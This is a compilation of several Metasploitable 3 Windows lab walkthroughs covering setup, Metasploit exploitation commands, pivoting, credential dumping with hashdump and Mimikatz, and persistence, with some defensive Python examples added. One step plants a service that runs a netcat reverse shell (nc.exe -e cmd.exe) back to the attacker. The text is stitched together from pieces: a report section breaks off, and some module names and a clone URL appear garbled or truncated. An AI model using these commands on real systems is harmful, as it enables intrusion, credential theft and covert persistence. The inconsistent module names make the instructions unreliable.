Metasploitable 3 Windows Walkthrough [SECURE | Hacks]

The first rule of engagement: Enumerate, enumerate, enumerate. We cannot attack what we do not know exists.

We start with a quick Nmap scan to identify open ports and running services.

nmap -sV -sC -p- -T4 <Target_IP> -oN ms3_scan.txt
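As an added example (not part of the original walkthrough), a small Python parser for the `-oN` file produced by the scan above, turning nmap's normal-format output into an inventory of open ports and service banners. The scan text embedded in it is constructed to mirror the services this page lists, not a real capture.

```python
import re

# Constructed sample of nmap "normal" (-oN) output mirroring the services this
# walkthrough lists for Metasploitable 3 (Windows); not a real capture.
SAMPLE_SCAN = """\
# Nmap 7.94 scan initiated as: nmap -sV -sC -p- -T4 192.168.56.102 -oN ms3_scan.txt
Nmap scan report for 192.168.56.102
Not shown: 65526 closed tcp ports (reset)
PORT      STATE    SERVICE       VERSION
21/tcp    open     ftp           Microsoft ftpd
80/tcp    open     http          Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
445/tcp   open     microsoft-ds  Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp  open     ms-sql-s      Microsoft SQL Server 2008 R2
3306/tcp  open     mysql         MySQL
3389/tcp  filtered ms-wbt-server
8020/tcp  open     http          Apache httpd
8080/tcp  open     http          Oracle GlassFish 4.0
9200/tcp  open     http          Elasticsearch REST API 1.1.1 (cluster: elasticsearch)
Service Info: OS: Windows
"""

# A port line is "<port>/<proto>  <state>  <service>  [<version...>]"; -sC script
# output starts with "|" and never matches, so it is skipped automatically.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)

def parse_nmap_normal(text):
    """One dict per port line, port as int, version banner stripped (may be empty)."""
    entries = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            d = m.groupdict()
            d["port"] = int(d["port"])
            d["version"] = d["version"].strip()
            entries.append(d)
    return entries

def open_ports(entries):
    """Sorted list of ports nmap reported as open (filtered/closed are left out)."""
    return sorted(e["port"] for e in entries if e["state"] == "open")

def version_table(entries):
    """port -> version banner for open ports: the exposure inventory for the report."""
    return {e["port"]: e["version"] for e in entries if e["state"] == "open"}
```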

Metasploitable 3 often has two network interfaces: NAT (internet) and Host-Only (192.168.56.x). From a Meterpreter session on the target you can pivot into the host-only network:

run autoroute -s 192.168.56.0/24
background
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.56.1-255
set PORTS 445
run

The host-only range also contains your actual host machine, so it may show up in the results. Do not scan without authorization.


# Ping sweep (host discovery only) to confirm the target is alive
nmap -sn 192.168.1.100

This walkthrough provides a comprehensive guide to setting up and exploiting Metasploitable 3, a Windows-based vulnerable virtual machine designed by Rapid7 for penetration testing practice.

1. Introduction to Metasploitable 3

Unlike its predecessor (Metasploitable 2), version 3 is built from the ground up using automation tools. It focuses on modern vulnerabilities found in Windows environments, specifically Windows Server 2008 R2. It’s an essential playground for learning lateral movement, service exploitation, and privilege escalation.

2. Lab Environment Setup

Before you begin, ensure your lab environment is ready:

Target: Metasploitable 3 (Windows)
Attacker: Kali Linux
Network: Both VMs should be on a Host-Only or NAT Network to ensure they can communicate while remaining isolated from the internet.

3. Phase 1: Reconnaissance & Scanning

Start by identifying the target IP and open services.

Nmap Scan:

nmap -sV -sC -O -p- <Target_IP>

What to look for:

Port 80/443/8080: HTTP services (IIS, Apache, GlassFish).
Port 445: SMB (Potential for EternalBlue or share enumeration).
Port 3306: MySQL.
Port 9200: Elasticsearch.

4. Phase 2: Exploitation Vectors

Vector A: Exploiting HTTP (Port 8080 - GlassFish)

Metasploitable 3 often runs a GlassFish server. This is a common entry point.

Search for Exploits: In Metasploit, search for glassfish_deployer.

Configuration:

use exploit/multi/http/glassfish_deployer
set RHOSTS <Target_IP>
set RPORT 8080
run

Result: If successful, you will gain a Meterpreter session.

Vector B: Exploiting SMB (Port 445)

Since this is a Windows 2008 R2 machine, it might be vulnerable to MS17-010 (EternalBlue).

Verify: Use auxiliary/scanner/smb/smb_ms17_010.

Exploit:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <Target_IP>
run

Result: This typically grants SYSTEM level access immediately.

5. Phase 3: Post-Exploitation & Privilege Escalation

If you gained access as a low-privilege user (e.g., through a web app), you need to escalate.

Enumeration with Local Exploit Suggester: Background your session (Ctrl+Z), then run:

use post/multi/recon/local_exploit_suggester
set SESSION 1
run
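Added example, not from the page: the two local misconfigurations this section goes on to name, AlwaysInstallElevated and unquoted service paths, are what a hardening audit checks for, and the Python below implements both checks offline. The service names and ImagePath values are constructed, and the registry values are passed in rather than read from a live host.

```python
import re

# Constructed service records, as a Windows service audit would return them
# (e.g. the ImagePath value under HKLM\SYSTEM\CurrentControlSet\Services\<name>,
# or the BINARY_PATH_NAME line of "sc qc <name>"). Names and paths are illustrative,
# not taken from a real Metasploitable 3 build.
SAMPLE_SERVICES = {
    "wuauserv":     r"C:\Windows\system32\svchost.exe -k netsvcs",
    "VendorAgent":  r"C:\Program Files\Vendor Tools\agent.exe /service",
    "BackupHelper": r'"C:\Program Files\Backup Helper\helper.exe" --daemon',
    "LegacySvc":    r"C:\Program Files (x86)\Legacy App\svc.exe",
    "Spooler":      r"C:\Windows\System32\spoolsv.exe",
}

# The executable ends at the first ".exe" token; anything after it is arguments.
EXE_TOKEN = re.compile(r"^(.*?\.exe)", re.IGNORECASE)

def is_unquoted_service_path(image_path: str) -> bool:
    """True when the executable path contains a space and is not wrapped in quotes.

    Windows tries each space-delimited prefix as a candidate executable before the
    real binary, so a writable directory along the path turns this into a privilege
    escalation. Quoted paths and paths whose only spaces are in the arguments pass.
    """
    p = image_path.strip()
    if not p or p.startswith('"'):
        return False
    m = EXE_TOKEN.match(p)
    exe = m.group(1) if m else p   # no .exe token: conservatively treat it all as path
    return " " in exe

def audit_unquoted_paths(services: dict) -> list:
    """Names of services whose ImagePath is unquoted and contains spaces, sorted."""
    return sorted(name for name, path in services.items() if is_unquoted_service_path(path))

def always_install_elevated(hkcu_value, hklm_value) -> bool:
    """Policy is active only when BOTH AlwaysInstallElevated values are DWORD 1.

    The values live under Software\\Policies\\Microsoft\\Windows\\Installer in HKCU and
    HKLM; on a host they would be read with reg query or winreg, here they are passed in.
    """
    return hkcu_value == 1 and hklm_value == 1

if __name__ == "__main__":
    print("unquoted service paths:", audit_unquoted_paths(SAMPLE_SERVICES))
    print("AlwaysInstallElevated active:", always_install_elevated(1, 1))
```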

Common Target: Look for AlwaysInstallElevated registry keys or unquoted service paths.

6. Phase 4: Looting and Persistence

Once you have admin/SYSTEM access:

Dump Hashes: Use hashdump in Meterpreter to grab NTLM hashes.

Mimikatz: Load the kiwi extension (load kiwi) to retrieve cleartext passwords from memory using creds_all.

Flags: Search the Administrator desktop and C:\ root for "flags" (usually .txt files) to complete the challenge.

7. Summary of Key Vulnerabilities

Vulnerability                               Metasploit Module
SMB                                         exploit/windows/smb/ms17_010_eternalblue
Elasticsearch RCE (CVE-2014-3120)           exploit/multi/elasticsearch/script_static_eval
Web Server (ManageEngine Desktop Central)   exploit/windows/http/manageengine_connection_id_rce

Conclusion

Metasploitable 3 Windows is a goldmine for practicing "living off the land" techniques and understanding how misconfigured Windows services lead to full domain compromise. Always remember to document your steps, as the goal is to improve your reporting as much as your hacking.

Getting Metasploitable 3 up and running on a Windows host is like setting up a playground for aspiring ethical hackers. It’s an intentionally vulnerable machine designed by Rapid7 to help you practice everything from basic scanning to complex post-exploitation.

Prerequisites

Before diving in, make sure your host machine is ready. You’ll need:

VirtualBox or VMware: To host the virtual machine.
Vagrant: This automates the building and management of your VMs.
Packer: Used for creating the machine images.
High Specs: At least 8GB of RAM and 50GB of disk space are recommended, since these builds can be heavy.

The Setup Process

Unlike Metasploitable 2, which was a simple downloadable file, Metasploitable 3 is built from scratch using scripts. This ensures you have the latest environment.

Install the Tools: Download and install VirtualBox, Vagrant, and Packer on your Windows machine.

Clone the Repository: Open PowerShell or Git Bash and run:

git clone https://github.com

Build the Image: Navigate into the folder and use Packer to build the Windows 2008 image. This step can take a while (30-60 minutes) as it downloads the ISO and installs the OS:

packer build windows_2008_r2.json

Launch with Vagrant: Once the build finishes, add the box to Vagrant and fire it up:

vagrant box add windows_2008_r2_virtualbox.box --name metasploitable3-win
vagrant up

The Walkthrough: A Typical Attack Cycle

Once the machine is running, you can start your "engagement" from a separate Kali Linux VM.

1. Reconnaissance and Scanning

Start by finding the target's IP address. Use Nmap to see what ports are open:

nmap -sV -O [Target_IP]

You’ll notice a wide attack surface, including HTTP (80), SMB (445), and various database ports like MySQL (3306).

2. Exploiting Web Vulnerabilities

Metasploitable 3 hosts several web applications. One common target is the ManageEngine Desktop Central instance. You can search for an exploit in Metasploit:

msfconsole
search manageengine
use exploit/windows/http/manageengine_connection_id_write

Set your RHOSTS and LHOST, then run exploit to gain a shell.

3. SMB and Internal Services

The machine is also vulnerable to classic Windows exploits. If you find the EternalBlue (MS17-010) vulnerability is unpatched, you can jump straight to SYSTEM-level access.

use exploit/windows/smb/ms17_010_eternalblue
exploit

4. Post-Exploitation

Once you have a Meterpreter session, the real fun begins. You can:

Dump Hashes: Use hashdump to get user credentials.
Pivot: Use the machine as a jump box to explore other parts of the network.
Search for Flags: Metasploitable 3 includes "flags" (like a CTF) hidden throughout the system to reward your progress.

Conclusion

Metasploitable 3 is more than just a target; it’s a masterclass in how modern Windows environments are structured and where they typically fail. By building it yourself and walking through these exploits, you gain a deep understanding of both the "how" and the "why" of cybersecurity. Happy hacking—stay ethical!

Metasploitable 3 Windows Walkthrough: A Comprehensive Guide

If you are diving into the world of penetration testing, Metasploitable 3 is your ultimate playground. Unlike its predecessor, which was a Linux-only VM, Metasploitable 3 offers a Windows version (typically based on Windows Server 2008 R2) that is intentionally riddled with vulnerabilities.

This walkthrough covers the setup and several key exploitation paths to help you sharpen your Red Team skills.

1. Lab Setup

Before hacking, you need to build the environment. Metasploitable 3 is unique because it is built automatically using Vagrant and Packer.

Install Prerequisites: You’ll need VirtualBox, Vagrant, and the vagrant-vbguest plugin.

Build the VM:

mkdir metasploitable3 && cd metasploitable3
vagrant init rapid7/metasploitable3-win2k8
vagrant up

Networking: Ensure your attacking machine (Kali Linux) is on the same host-only network as the Metasploitable 3 instance.

2. Information Gathering

The first step in any engagement is reconnaissance. Let’s identify the open ports and services.

Nmap Scan:

nmap -sV -sC -O 192.168.x.x

You will notice a massive attack surface, including:

Port 80/443: IIS 7.5
Port 445: SMB
Port 1433: MSSQL
Port 3306: MySQL
Port 9200: Elasticsearch

3. Exploitation Path A: ElasticSearch (Remote Code Execution)

ElasticSearch on Metasploitable 3 is often an older version vulnerable to CVE-2014-3120. This allows for dynamic script execution.

Search for the exploit: In Metasploit, use search elasticsearch. Configure:

use exploit/multi/elasticsearch/script_static_iv_clobber
set RHOSTS [Target IP]
set LHOST [Your IP]
exploit

Result: You should receive a Meterpreter session running as the user under which ElasticSearch is installed.

4. Exploitation Path B: ManageEngine Desktop Central

Metasploitable 3 hosts an instance of ManageEngine that is vulnerable to a file upload vulnerability (CVE-2015-8249).

Search: use exploit/windows/http/manageengine_connectionid_write.

Execute: Set your RHOSTS and RPORT (usually 8020).

Result: This often grants SYSTEM level access immediately, as the service runs with high privileges.

5. Exploitation Path C: Weak Credentials (SMB/MSSQL)

Metasploitable 3 simulates real-world "bad habits," like using default or weak passwords.

SMB: You can use auxiliary/scanner/smb/smb_login with common wordlists.

MSSQL: The sa account often has a weak password. Use exploit/windows/mssql/mssql_payload once you have credentials to gain a shell.

6. Post-Exploitation & Privilege Escalation

Once you have a foothold (a standard user shell), your goal is to become NT AUTHORITY\SYSTEM. Local Exploit Suggester:

use post/multi/recon/local_exploit_suggester
set SESSION 1
run

Token Impersonation: If you are an admin but not SYSTEM, use the incognito module in Meterpreter:

use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

7. The Flags

Metasploitable 3 is designed as a Capture The Flag (CTF) environment. Look for custom icons or text files scattered throughout the system (e.g., on the Administrator's desktop or in the root directory). Each flag represents a successfully compromised service.

Metasploitable 3 Windows serves as a valuable tool for understanding how common misconfigurations and legacy software vulnerabilities can affect a Windows environment. Exploring these pathways provides insight into the importance of regular patching, secure configuration management, and the principle of least privilege.

By identifying these weaknesses in a controlled laboratory setting, security professionals can better develop defensive strategies, improve incident response procedures, and strengthen the overall security posture of production systems.

🛡️ Penetration Testing Report: Metasploitable 3 (Windows)

1. Executive Summary

This assessment details the security posture of the Metasploitable 3 Windows virtual machine. The objective of this exercise was to identify security vulnerabilities, demonstrate exploitation vectors, and provide remediation steps to secure the asset. Multiple high and critical-severity vulnerabilities were identified, including unauthenticated remote code execution and weak credential policies.

Target Details:

Operating System: Windows Server 2008 R2 (Metasploitable 3)
IP Address: 192.168.1.36 (Example IP)
Testing Machine: Kali Linux

2. Methodology & Phases

The engagement followed the Penetration Testing Execution Standard:

Reconnaissance & Scanning: Discovering live hosts and open ports.
Vulnerability Analysis: Identifying outdated software and weak configurations.
Exploitation: Gaining initial access to the system.
Privilege Escalation: Elevating standard user access to administrative rights.

3. Detailed Walkthrough

🔍 Phase 1: Scanning & Enumeration

The initial step involved identifying exposed attack surfaces using Nmap.

nmap -sV -sC -A <Target_IP>

Metasploitable 3 (Windows) Write-up — Part I: FTP (PORT 21)


To make this walkthrough smooth, set both VMs to a Host-Only Network (or a custom NAT network). This isolates the carnage from your physical router.

Verify connectivity: ping 192.168.56.102 from Kali.


Metasploit method (Meterpreter persistence script):

run persistence -U -i 10 -p 4444 -r 192.168.56.102

Manual – Create a service:

sc create "UpdateService" binpath= "cmd.exe /k C:\path\to\nc.exe 192.168.56.102 443 -e cmd.exe" start= auto
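Added example from the defender's side, not part of the original write-up: a service created the way shown above leaves a System log event 7045 ("A service was installed in the system") record, and the Python below scores such records for persistence indicators. The records are constructed to mirror the sc create command, not real log data.

```python
import re

# Constructed records shaped like the fields of Windows System log event 7045
# ("A service was installed in the system"). Not real log data; the first record
# mirrors the manual sc create persistence command shown above.
SAMPLE_EVENTS = [
    {"ServiceName": "UpdateService",
     "ImagePath": r"cmd.exe /k C:\path\to\nc.exe 192.168.56.102 443 -e cmd.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "VSS",
     "ImagePath": r"C:\Windows\system32\vssvc.exe",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"ServiceName": "VendorUpdater",
     "ImagePath": r'"C:\Program Files\Vendor\updater.exe" /svc',
     "StartType": "auto start", "AccountName": "LocalSystem"},
]

SHELL_RE   = re.compile(r"\b(cmd|powershell|pwsh|wscript|cscript|mshta)\.exe\b", re.I)
NETCAT_RE  = re.compile(r"\bnc(at|64)?\.exe\b|\s-e\s+\S*cmd", re.I)   # netcat binary or "-e cmd"
IPV4_RE    = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
TRUSTED_RE = re.compile(r'^"?(C:\\Windows\\|C:\\Program Files)', re.I)

def score_service_install(event: dict) -> list:
    """Reasons a newly installed service looks like a persistence implant (empty = no indicator)."""
    path = event["ImagePath"]
    reasons = []
    if SHELL_RE.search(path):
        reasons.append("image path launches a command interpreter")
    if NETCAT_RE.search(path):
        reasons.append("netcat-style binary or '-e cmd' shell flag")
    if IPV4_RE.search(path):
        reasons.append("literal IPv4 address in the service command line")
    if not TRUSTED_RE.match(path):
        reasons.append("binary outside C:\\Windows or Program Files")
    if reasons and event.get("StartType", "").startswith("auto"):
        reasons.append("auto-start: the implant survives reboot")
    return reasons

def flag_suspicious(events: list) -> dict:
    """Service name -> reasons, for every record with at least one indicator."""
    return {e["ServiceName"]: r for e in events if (r := score_service_install(e))}

if __name__ == "__main__":
    for name, reasons in flag_suspicious(SAMPLE_EVENTS).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```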